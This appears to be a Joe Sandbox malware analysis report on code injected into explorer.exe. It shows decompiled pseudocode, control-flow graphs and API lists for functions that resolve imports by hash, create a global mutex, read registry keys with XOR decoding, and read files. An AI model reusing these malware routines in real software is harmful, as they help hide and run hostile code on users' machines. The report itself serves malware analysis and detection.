                  0x00086245
                  0x00086249
                  0x0008624d
                  0x0008624e
                  0x0008624f
                  0x00086250
                  0x00086251
                  0x00086255
                  0x0008625c
                  0x0008625d
                  0x00086262
                  0x0008626d
                  0x00086282
                  0x00086284
                  0x00000000
                  0x00000000
                  0x0008628a
                  0x0008628d
                  0x00086295
                  0x000862a2
                  0x000862a7
                  0x000862aa
                  0x000862b3
                  0x000862ba
                  0x000862ca
                  0x000862d4
                  0x000862da
                  0x000862dc
                  0x000862e1
                  0x000862ea
                  0x000862ec
                  0x000862ee
                  0x000862f0
                  0x000862fa
                  0x00086300
                  0x00086304
                  0x00086308
                  0x0008630d
                  0x00086313
                  0x00086315
                  0x00086317
                  0x00086317
                  0x0008631e
                  0x0008631e
                  0x00086304
                  0x00086323
                  0x00086323
                  0x00086326
                  0x00086327
                  0x0008632a
                  0x0008632a
                  0x00000000
                  0x0008628d
                  0x0008626f
                  0x00086277
                  0x00000000

                  APIs
                  • memset.MSVCRT ref: 000861D2
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
                  • memset.MSVCRT ref: 00086295
                  • memset.MSVCRT ref: 000862A2
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memset$AllocateHeapOpen
                  • String ID:
                  • API String ID: 2508404634-0
                  • Opcode ID: 2c10b8fd77ca7376de3cbe200ec582f4a2f8f81022b5455d208053da19f68b67
                  • Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
                  • Opcode Fuzzy Hash: 2c10b8fd77ca7376de3cbe200ec582f4a2f8f81022b5455d208053da19f68b67
                  • Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008DFAD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 77 8dfad-8dfc4 78 8e021 77->78 79 8dfc6-8dfee 77->79 81 8e023-8e027 78->81 79->78 80 8dff0-8e013 call 8c379 call 8d400 79->80 86 8e028-8e03f 80->86 87 8e015-8e01f 80->87 88 8e041-8e049 86->88 89 8e095-8e097 86->89 87->78 87->80 88->89 90 8e04b 88->90 89->81 91 8e04d-8e053 90->91 92 8e063-8e074 91->92 93 8e055-8e057 91->93 95 8e079-8e085 LoadLibraryA 92->95 96 8e076-8e077 92->96 93->92 94 8e059-8e061 93->94 94->91 94->92 95->78 97 8e087-8e091 GetProcAddress 95->97 96->95 97->78 98 8e093 97->98 98->81
                  C-Code - Quality: 100%
                  			E0008DFAD(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E0008D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0008C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                  0x0008dfb6
                  0x0008dfb8
                  0x0008dfbb
                  0x0008dfbe
                  0x0008dfc4
                  0x0008e021
                  0x00000000
                  0x0008e021
                  0x0008dfc6
                  0x0008dfd1
                  0x0008dfd4
                  0x0008dfd9
                  0x0008dfde
                  0x0008dfe1
                  0x0008dfe3
                  0x0008dfe6
                  0x0008dfe9
                  0x0008dfee
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008dff0
                  0x0008dff0
                  0x0008e002
                  0x0008e00f
                  0x0008e013
                  0x00000000
                  0x00000000
                  0x0008e015
                  0x0008e018
                  0x0008e019
                  0x0008e01f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e01f
                  0x0008e036
                  0x0008e03b
                  0x0008e03f
                  0x00000000
                  0x0008e04b
                  0x0008e04b
                  0x0008e04d
                  0x0008e04d
                  0x0008e053
                  0x00000000
                  0x00000000
                  0x0008e059
                  0x0008e05d
                  0x0008e061
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e061
                  0x0008e067
                  0x0008e06f
                  0x0008e074
                  0x0008e077
                  0x0008e077
                  0x0008e079
                  0x0008e07d
                  0x0008e085
                  0x00000000
                  0x00000000
                  0x0008e089
                  0x0008e091
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0008e091

                  APIs
                  • LoadLibraryA.KERNEL32(.dll), ref: 0008E07D
                  • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0008E089
                  Strings
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressLibraryLoadProc
                  • String ID: .dll
                  • API String ID: 2574300362-2738580789
                  • Opcode ID: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction ID: 961bbec8ee8d513a9e7f355b8d92f0886381f3dfd6057b13809224bdd72c88db
                  • Opcode Fuzzy Hash: 6b3667d21c83c631e7308aa9a773b73a335c260cf3743c54930195356ac01f65
                  • Instruction Fuzzy Hash: 6F310631A001458BCB25EFADC884BAEBBF5BF44304F280869D981D7352DB70EC81CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B998, Relevance: 4.6, APIs: 3, Instructions: 54COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 99 8b998-8b9b8 GetTokenInformation 100 8b9ba-8b9c3 GetLastError 99->100 101 8b9fe 99->101 100->101 102 8b9c5-8b9d5 call 88604 100->102 103 8ba00-8ba04 101->103 106 8b9db-8b9ee GetTokenInformation 102->106 107 8b9d7-8b9d9 102->107 106->101 108 8b9f0-8b9fc call 8861a 106->108 107->103 108->107
                  C-Code - Quality: 86%
                  			E0008B998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
				long _v8;
				void* _v12;
				void* _t12;
				void* _t20;
				void* _t22;
				union _TOKEN_INFORMATION_CLASS _t28;
				void* _t31;

				_push(_t22);
				_push(_t22);
				_t31 = 0;
				_t28 = __edx;
				_t20 = _t22;
				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L6:
					_t12 = _t31;
				} else {
					_t31 = E00088604(_v8);
					_v12 = _t31;
					if(_t31 != 0) {
						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
							goto L6;
						} else {
							E0008861A( &_v12, _t16);
							goto L3;
						}
					} else {
						L3:
						_t12 = 0;
					}
				}
				return _t12;
			}










                  0x0008b99b
                  0x0008b99c
                  0x0008b9a3
                  0x0008b9ab
                  0x0008b9af
                  0x0008b9b8
                  0x0008b9fe
                  0x0008b9fe
                  0x0008b9c5
                  0x0008b9cd
                  0x0008b9cf
                  0x0008b9d5
                  0x0008b9ee
                  0x00000000
                  0x0008b9f0
                  0x0008b9f5
                  0x00000000
                  0x0008b9fb
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d7
                  0x0008b9d5
                  0x0008ba04

                  APIs
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9B3
                  • GetLastError.KERNEL32(?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9BA
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,0008BA37,?,00000000,?,0008D0A8), ref: 0008B9E9
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: InformationToken$AllocateErrorHeapLast
                  • String ID:
                  • API String ID: 2499131667-0
                  • Opcode ID: e51f026ae96c3c8f60bad79ad9c5e503849fc6e82ed7bacb152c5b9dcafac048
                  • Instruction ID: 50b00f07447128573cf446961854993498285b3da02e0cb9ad280b6d8ca9cbf5
                  • Opcode Fuzzy Hash: e51f026ae96c3c8f60bad79ad9c5e503849fc6e82ed7bacb152c5b9dcafac048
                  • Instruction Fuzzy Hash: 62016272600118BF9B64ABAADC49DAB7FECFF457A17110666F685D3211EB34DD0087A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008590C, Relevance: 4.5, APIs: 3, Instructions: 44synchronizationCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 111 8590c-85915 112 8591c-85932 CreateMutexA 111->112 113 85917-8591a 111->113 115 8593f-8594a GetLastError 112->115 116 85934-8593d GetLastError 112->116 114 8596e-85973 113->114 118 8594c-85958 call 8a4bf 115->118 119 85965-8596b 115->119 117 8596d 116->117 117->114 118->119 122 8595a-85963 118->122 119->117 122->117
                  C-Code - Quality: 100%
                  			E0008590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr _t10;
				void* _t13;
				void* _t19;
				signed int _t21;
				signed int _t22;

				_t13 = __edx;
				if(__ecx != 0) {
					_t22 = 0;
					_t19 = CreateMutexA(0, 1, __ecx);
					if(_t19 != 0) {
						if(GetLastError() != 0xb7 || E0008A4BF(_t19, _t13) != 0xffffffff) {
							_t22 = 1;
							 *_a4 = _t19;
						} else {
							_t10 =  *0x9e684; // 0x293f8f0
							 *((intOrPtr*)(_t10 + 0x30))(_t19);
						}
					} else {
						GetLastError();
						_t22 = 0xffffffff;
					}
				} else {
					_t22 = _t21 | 0xffffffff;
				}
				return _t22;
			}








                  0x00085910
                  0x00085915
                  0x00085921
                  0x0008592e
                  0x00085932
                  0x0008594a
                  0x0008596a
                  0x0008596b
                  0x0008595a
                  0x0008595a
                  0x00085960
                  0x00085960
                  0x00085934
                  0x00085934
                  0x0008593a
                  0x0008593a
                  0x00085917
                  0x00085917
                  0x00085917
                  0x00085973

                  APIs
                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085928
                  • GetLastError.KERNEL32(?,?,000859CD,00085DD4,Global,0009BA18,?,00000000,?,00000002), ref: 00085934
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateErrorLastMutex
                  • String ID:
                  • API String ID: 1925916568-0
                  • Opcode ID: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction ID: 1c4491eb415752db81424c57f385e659120548c2048b1677d1101b25907139c6
                  • Opcode Fuzzy Hash: 1e9ba27d02d2df59a864ede134e86214b79921280e0dcb6860e8fc376ac35514
                  • Instruction Fuzzy Hash: 3FF02831600910CBEA20276ADC4497E76D8FBE6772B510322F9E9D72D0DF748C0543A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00089B43, Relevance: 3.3, APIs: 2, Instructions: 254COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 124 89b43-89b75 call 88604 127 89b7e-89b9e call 8b5f6 124->127 128 89b77-89b79 124->128 132 89ba0 127->132 133 89ba3-89bb8 call 895c7 127->133 129 89e1a-89e1e 128->129 132->133 136 89cee-89cfb 133->136 137 89bbe-89bd6 133->137 138 89d3c-89d4c call 89292 136->138 139 89cfd-89d1e 136->139 143 89ceb 137->143 144 89bdc-89bf8 137->144 146 89d4f-89d51 138->146 147 89d20-89d3a call 89292 139->147 148 89d54-89d74 call 885c2 RegOpenKeyExA 139->148 143->136 144->148 154 89bfe-89c18 call 89292 144->154 146->148 147->146 155 89dc8-89dcd 148->155 156 89d76-89d8b 148->156 163 89d8d-89db2 call 8861a memset call 8861a 154->163 164 89c1e-89c36 154->164 158 89dcf 155->158 159 89dd5 155->159 156->163 165 89dba-89dbf 156->165 158->159 161 89dd8-89df4 call 8c379 159->161 181 89e0b-89e18 call 8861a 161->181 182 89df6-89e09 161->182 163->165 174 89c38-89c7c call 895e1 call 892e5 call 885d5 call 89256 164->174 175 89cab-89cb0 164->175 167 89dc1 165->167 168 89dc3-89dc6 165->168 167->168 168->161 197 89c8b-89ca9 call 8861a * 2 174->197 198 89c7e-89c83 174->198 180 89cb6-89ce9 call 89292 call 8861a 175->180 180->148 181->129 182->181 182->182 197->180 198->197 199 89c85 198->199 199->197
                  C-Code - Quality: 89%
                  			E00089B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				int _t91;
				char* _t92;
				long _t96;
				int* _t97;
				intOrPtr _t98;
				int* _t101;
				intOrPtr _t110;
				int* _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E00088604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E0008B5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000895C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E00089292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0x9e68c; // 0x293fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E00089292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0x9e688; // 0xb0000
						_t128 =  *0x9e68c; // 0x293fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0x9e68c; // 0x293fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000885C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								_t98 =  *0x9e68c; // 0x293fab8
								 *((intOrPtr*)(_t98 + 0x1c))();
								_t155[0x43] = _v8;
								_t101 = E0008C379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E0008861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t110 =  *0x9e68c; // 0x293fab8
							_t111 =  *((intOrPtr*)(_t110 + 0x28))(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E0008861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E0008861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E00089292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0x9e68c; // 0x293fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0x9e68c; // 0x293fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000895E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000892E5(_v32);
							_v32 = _t179;
							E000885D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E00089256(_v12);
							_v24 = _t147;
							_t148 =  *0x9e68c; // 0x293fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E0008861A( &_v32, 0xfffffffe);
							E0008861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E00089292(_v12);
						_t171 =  *0x9e684; // 0x293f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E0008861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}




















































                  0x00089b4c
                  0x00089b4e
                  0x00089b51
                  0x00089b53
                  0x00089b5b
                  0x00089b5e
                  0x00089b65
                  0x00089b6d
                  0x00089b6f
                  0x00089b75
                  0x00089b7e
                  0x00089b86
                  0x00089b8c
                  0x00089b93
                  0x00089b99
                  0x00089b9b
                  0x00089b9e
                  0x00089ba0
                  0x00089ba0
                  0x00089ba0
                  0x00089ba8
                  0x00089bab
                  0x00089bb0
                  0x00089bb3
                  0x00089bb6
                  0x00089bb8
                  0x00089cee
                  0x00089cee
                  0x00089cf4
                  0x00089cfb
                  0x00089d3c
                  0x00089d40
                  0x00089d41
                  0x00089d47
                  0x00089d4c
                  0x00089d4f
                  0x00089d4f
                  0x00089d51
                  0x00000000
                  0x00089d51
                  0x00089d00
                  0x00089d0a
                  0x00089d13
                  0x00089d18
                  0x00089d1b
                  0x00089d1e
                  0x00000000
                  0x00000000
                  0x00089d20
                  0x00089d24
                  0x00089d25
                  0x00089d2a
                  0x00089d2b
                  0x00089d2e
                  0x00089d32
                  0x00089d37
                  0x00000000
                  0x00089bbe
                  0x00089bbe
                  0x00089bcb
                  0x00089bd1
                  0x00089bd4
                  0x00089bd6
                  0x00089ceb
                  0x00000000
                  0x00089ceb
                  0x00089bdf
                  0x00089be3
                  0x00089beb
                  0x00089bf2
                  0x00089bf5
                  0x00089bf8
                  0x00089d54
                  0x00089d57
                  0x00089d6f
                  0x00089d72
                  0x00089d74
                  0x00089dc8
                  0x00089dcb
                  0x00089dcd
                  0x00089dcf
                  0x00089dcf
                  0x00089dd5
                  0x00089dd8
                  0x00089dd8
                  0x00089ddd
                  0x00089de4
                  0x00089dea
                  0x00089def
                  0x00089df2
                  0x00089df4
                  0x00089e0b
                  0x00089e11
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00089df6
                  0x00089df6
                  0x00089e02
                  0x00089e06
                  0x00089e07
                  0x00089e07
                  0x00000000
                  0x00089df6
                  0x00089d79
                  0x00089d7d
                  0x00089d86
                  0x00089d89
                  0x00089d8b
                  0x00089dba
                  0x00089dbd
                  0x00089dbf
                  0x00089dc1
                  0x00089dc1
                  0x00089dc3
                  0x00000000
                  0x00089dc3
                  0x00089d8d
                  0x00089d96
                  0x00089da2
                  0x00089dad
                  0x00000000
                  0x00089db2
                  0x00089bfe
                  0x00089bff
                  0x00089c02
                  0x00089c07
                  0x00089c0b
                  0x00089c10
                  0x00089c13
                  0x00089c16
                  0x00089c18
                  0x00000000
                  0x00000000
                  0x00089c29
                  0x00089c31
                  0x00089c34
                  0x00089c36
                  0x00089cab
                  0x00089cb3
                  0x00089c38
                  0x00089c3a
                  0x00089c49
                  0x00089c51
                  0x00089c57
                  0x00089c5a
                  0x00089c62
                  0x00089c65
                  0x00089c6f
                  0x00089c72
                  0x00089c77
                  0x00089c7a
                  0x00089c7c
                  0x00089c7e
                  0x00089c81
                  0x00089c83
                  0x00089c85
                  0x00089c85
                  0x00089c83
                  0x00089c91
                  0x00089c9c
                  0x00089ca1
                  0x00089ca4
                  0x00089ca4
                  0x00089cc3
                  0x00089cc8
                  0x00089cce
                  0x00089cd1
                  0x00089cd3
                  0x00089cd9
                  0x00089ce2
                  0x00000000
                  0x00089ce8
                  0x00089bb8
                  0x00089b77
                  0x00000000

                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: a32202737b0ffe39fe72c82567a31338c5d0341a1a0eae89acf1f4c60a43a43c
                  • Instruction ID: 48420b51e388212ba148de9a5a5aa9c152fd141e90dbe33b6e7652c92ab7c875
                  • Opcode Fuzzy Hash: a32202737b0ffe39fe72c82567a31338c5d0341a1a0eae89acf1f4c60a43a43c
                  • Instruction Fuzzy Hash: 139127B1900209AFDF10EFA9DD45DEEBBB8FF48310F144169F555AB262DB359A00CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008A6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 204 8a6a9-8a6b9 205 8a6bb-8a6bd 204->205 206 8a6c2-8a6cd call 8a63b 204->206 207 8a75b-8a75d 205->207 210 8a6d3-8a6e5 206->210 211 8a757 206->211 214 8a73d-8a748 210->214 215 8a6e7-8a6f8 call 88604 210->215 212 8a759-8a75a 211->212 212->207 214->211 219 8a74a-8a756 call 8861a 214->219 215->214 220 8a6fa-8a709 215->220 219->211 222 8a72d-8a73b ReadFile 220->222 222->214 223 8a70b-8a70f 222->223 225 8a75e-8a761 223->225 226 8a711-8a72c 223->226 225->214 227 8a763-8a76c 225->227 226->222 228 8a76e 227->228 229 8a770-8a77b CloseHandle 227->229 228->229 229->212
                  C-Code - Quality: 27%
                  			E0008A6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E0008A63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0x9e684; // 0x293f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0x9e684; // 0x293f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E0008861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E00088604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














                  0x0008a6ac
                  0x0008a6ad
                  0x0008a6ae
                  0x0008a6b2
                  0x0008a6b4
                  0x0008a6b9
                  0x0008a6c9
                  0x0008a6cd
                  0x0008a757
                  0x0008a757
                  0x0008a759
                  0x0008a75b
                  0x0008a75d
                  0x0008a75d
                  0x0008a6d3
                  0x0008a6e1
                  0x0008a6e5
                  0x0008a73d
                  0x0008a73d
                  0x0008a743
                  0x0008a748
                  0x0008a750
                  0x0008a756
                  0x00000000
                  0x0008a748
                  0x0008a6e7
                  0x0008a6eb
                  0x0008a6f0
                  0x0008a6f2
                  0x0008a6f8
                  0x00000000
                  0x00000000
                  0x0008a6fc
                  0x0008a6ff
                  0x0008a700
                  0x0008a706
                  0x0008a707
                  0x0008a708
                  0x0008a72d
                  0x0008a70f
                  0x0008a761
                  0x00000000
                  0x00000000
                  0x0008a763
                  0x0008a766
                  0x0008a76c
                  0x0008a76e
                  0x0008a76e
                  0x0008a776
                  0x0008a779
                  0x00000000
                  0x0008a779
                  0x0008a717
                  0x0008a71a
                  0x0008a71e
                  0x0008a720
                  0x0008a723
                  0x0008a728
                  0x0008a72c
                  0x0008a72c
                  0x00000000
                  0x0008a72d
                  0x0008a6bb
                  0x00000000

                  APIs
